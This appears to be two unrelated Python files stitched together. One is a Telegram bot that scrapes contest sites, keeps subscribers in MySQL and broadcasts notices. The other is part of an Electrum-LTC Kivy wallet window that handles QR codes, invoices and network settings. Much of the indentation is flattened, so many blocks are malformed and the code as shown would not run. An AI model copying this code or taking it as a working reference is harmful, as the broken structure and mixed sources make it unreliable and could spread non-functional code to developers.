db_id = '<INPUT_YOUR_DATABASE_ID>'
db_pw = '<INPUT_YOUR_DATABASE_PASSWORD>'
db_name = '<INPUT_YOUR_DATABASE_NAME>'
db = MySQLdb.connect( host, db_id, db_pw, db_name, charset='utf8') # Encoding utf-8
mydb = SupportMysql(db) # DB controller
scheduler = Scheduler(bot)
parser = ContestParser()
# Message sent when the /help command is used
help_message =(
"<INPUT_YOUR_HELP_MESSAGE>"
)
# Message sent when the /start command is used
start_message_True=( # when the user was successfully stored in the database
"<INPUT_YOUR_MESSAGE>"
)
start_message_False=( # when the user is already stored in the database
"<INPUT_YOUR_MESSAGE>"
)
# Message sent when the /unsubscribe command is used
unsubscribe_message = (
"<INPUT_YOUR_MESSAGE>"
)
def sendNotification(bot, mydb):
    ''' Parse the supported websites, detect newly updated contests and send notification messages to the users '''
    notiList = [] # [[site name, parsing list]...] entries for which a notification must be sent
    ContestListFile = [] # names of the files in which previously parsed data is stored
    siteList = parser.siteList # supported site names (used when parsing the websites)
    siteNameList = parser.siteNameList # supported site names in Korean (used when sending messages)
    parsingData = [] # parsed data is collected here
for s in siteList:
        ContestListFile.append(s + "List.data") # remember the file name used to store this site's results
        temp = parser.returnParsingData(s) # parse each website and keep the result in a temporary variable
parsingData.append(temp)
    for parData in parsingData: # use the parsed data of each website
        before = [] # previously parsed data (compared with the current parse to detect newly updated entries)
        # brute-force approach, but it works for now
index = int(parsingData.index(parData))
fileName = ContestListFile[index]
siteName = siteNameList[index]
        try: # a saved file exists
            # load the previously saved record
f = open(fileName, 'rb')
before = pickle.load(f)
f.close()
            # save the freshly parsed data
f = open(fileName, 'wb')
pickle.dump(parData, f)
f.close()
        except: # no saved file exists yet
            # save the freshly parsed data
f = open(fileName, 'wb')
pickle.dump(parData, f)
f.close()
            before = parData # use the current parse as the previous record
            # (as a result, no notification is sent on the very first run)
        if before != 'error': # parsing succeeded ('error' is returned when parsing fails, e.g. after a site layout change)
            for b in before: # iterate over the previously parsed contest entries of this site
                # starting from the most recently updated contest in the previous record,
                # find its index in the freshly parsed list
                # in case a previously recorded contest page has since been removed,
                # keep going until a match is found in the freshly parsed list
tempIndex = parser.findListIndex(parData, b)
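                # e.g. (hypothetical) if the previously newest entry is now at
                # index 3 of the fresh parse, entries 0-2 are new and will be
                # queued for notification below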
                if tempIndex != -1: # match found (-1 is returned when nothing matches)
                    saveList = [] # newly updated contests are collected here
                    for i in range(tempIndex): # collect the newly updated contests
                        saveList.append(parData[i])
                    notiList.append([siteName, saveList]) # store together with the site name (to be changed to a dict later)
break
        elif before == 'error': # react quickly when a site could not be parsed properly
            bot.send_message(administratorChatID, "{} 사이트 에러 확인 요망".format(siteName)) # notify the administrator of the error
pass
else:
pass
    messageList = [] # messages to be sent (the newly updated contest list)
    for n in notiList: # build the messages to send
siteName = n[0]
parserList = n[1]
for p in parserList:
text = (
"[{siteName}] {title} | {period} | {sponsor}\n{url}"
)
msg = text.format(siteName=siteName, title=p['title'], period=p['period'], sponsor=p['sponsor'],
url=p['url'])
messageList.append(msg)
    memberList = mydb.returnCommand("SELECT * FROM memberTbl") # fetch the users stored in the DB
    if memberList == 'error': # the DB returned an error value
        bot.send_message(administratorChatID, "DB 에러 확인 요망") # notify the administrator of the error
else:
        for data in memberList: # send a message to every user (threads are used for speed)
cid = data[0]
t = threading.Thread(target=sendContest, args=(bot, mydb, cid, messageList))
t.start()
def sendContest(bot, mydb, cid, messageList):
    ''' Send contest notifications to the users '''
for msg in messageList:
        try: # attempt to send the message
bot.send_message(cid, msg)
except telebot.apihelper.ApiException as e:
            error_code = str(e.result) # keep the error code
            if error_code.find("403") != -1: # a 403 error occurred (the user deleted or blocked the bot)
                # remove the user from the DB
                msg = mydb.deleteMsg('memberTbl', "chatID = '{}'".format(cid))
                check = mydb.setCommand(msg)
                if check==False: # the DB command did not execute successfully
                    bot.send_message(administratorChatID, "DB 멤버삭제 에러") # notify the administrator of the error
break
if __name__ == '__main__':
    scheduler.scheduler('cron', "1", sendNotification, bot, mydb) # runs every 10 minutes between 07:00 and 20:00
pass
# When receive '/start, /subscribe' command
@bot.message_handler(commands=['start', 'subscribe'])
def send_start(m):
''' Register user chatID in the database '''
cid = m.chat.id # Get chat ID
    check = mydb.initMember(cid) # Check whether the user is already registered and register the chat ID in the database
name = m.chat.last_name + m.chat.first_name # Get user name
markup = types.ReplyKeyboardHide() # Keyboard markup
if check: # Send success message
msg = start_message_True.format(name, name, cid) + '\n\n' + help_message
try:
bot.send_message(cid, msg, reply_markup=markup)
except telebot.apihelper.ApiException as e:
pass
else: # Send fail message
msg = start_message_False.format(name)
try:
bot.send_message(cid, msg, reply_markup=markup)
except telebot.apihelper.ApiException as e:
pass
# When receive '/unsubscribe' command
@bot.message_handler(commands=['unsubscribe'])
def subscribe(m):
    ''' Remove the user's subscription from the database '''
cid = m.chat.id
name = m.chat.last_name + m.chat.first_name # Get user name
msg = mydb.deleteMsg('memberTbl', "chatID = '{}'".format(cid))
check = mydb.setCommand(msg)
    if check: # the DB command executed successfully
bot.send_message(cid, unsubscribe_message.format(name=name))
else:
        bot.send_message(administratorChatID, "DB 멤버삭제 에러") # notify the administrator of the error
# When receive '/help' command
@bot.message_handler(commands=['help'])
def send_help(m):
''' Send help message '''
cid = m.chat.id
markup = types.ReplyKeyboardHide()
try:
bot.send_message(cid, help_message, reply_markup=markup)
except telebot.apihelper.ApiException as e:
pass
# When receive '/bot_restart' command
@bot.message_handler(commands=['bot_restart'])
def bot_restart(m):
    ''' Restart the bot (administrator only) '''
cid = m.chat.id # Get chat ID
if str(cid) == administratorChatID:
bot.send_message(cid, "봇을 재시작합니다.")
os.system("<INPUT_YOUR_RESTART_COMMAND>")
else:
try:
bot.send_message(cid, "권한이 없습니다.")
except telebot.apihelper.ApiException as e:
return
# Receive all message
@bot.message_handler(func=lambda message : True)
def echo_all(m):
if m.text == '/cancel':
pass
elif m.text[0] == '/':
try:
bot.send_message(m.chat.id, '{} 명령어가 존재하지 않습니다.\n이 봇의 명령어는 /help 명령어를 통해 확인할 수 있습니다.'.format(m.text))
except telebot.apihelper.ApiException as e:
pass
else:
pass
bot.polling(none_stop=True)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_ltc.storage import WalletStorage, StorageReadWriteError
from electrum_ltc.wallet_db import WalletDB
from electrum_ltc.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_ltc.plugin import run_hook
from electrum_ltc import util
from electrum_ltc.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_ltc.invoices import PR_PAID, PR_FAILED
from electrum_ltc import blockchain
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_ltc.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_ltc.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_ltc.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_ltc.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_ltc.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache to keep memory usage down; the timeout is set to
# forever (0) so the data stays cached
Cache.register('electrum_ltc_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_ltc.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum_ltc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_ltc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_ltc/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_ltc/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_ltc.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.plugin import Plugins
from electrum_ltc.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'viacoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
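    # Illustrative note (hypothetical numbers, assuming fx is enabled): with
    # decimal_point() == 8 and an exchange rate of 100 fiat units per coin,
    # btc_to_fiat('1.5') returns '150' and fiat_to_btc('150') returns '1.5',
    # i.e. the two helpers below are inverses up to display formatting.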
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Current screen orientation of the app.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that updates happen at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_ltc.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('viacoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_ltc.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_ltc/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
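# handle_crash_on_startup wraps on_start so that any exception raised while the
# UI is being built opens the CrashReporter dialog instead of failing silently;
# dismissing the reporter then stops the app.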
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the entry point of the Kivy UI.
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum_ltc/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum_ltc/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_ltc.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_ltc.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_ltc_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_ltc_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum_ltc/gui/icons/electrum-ltc.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
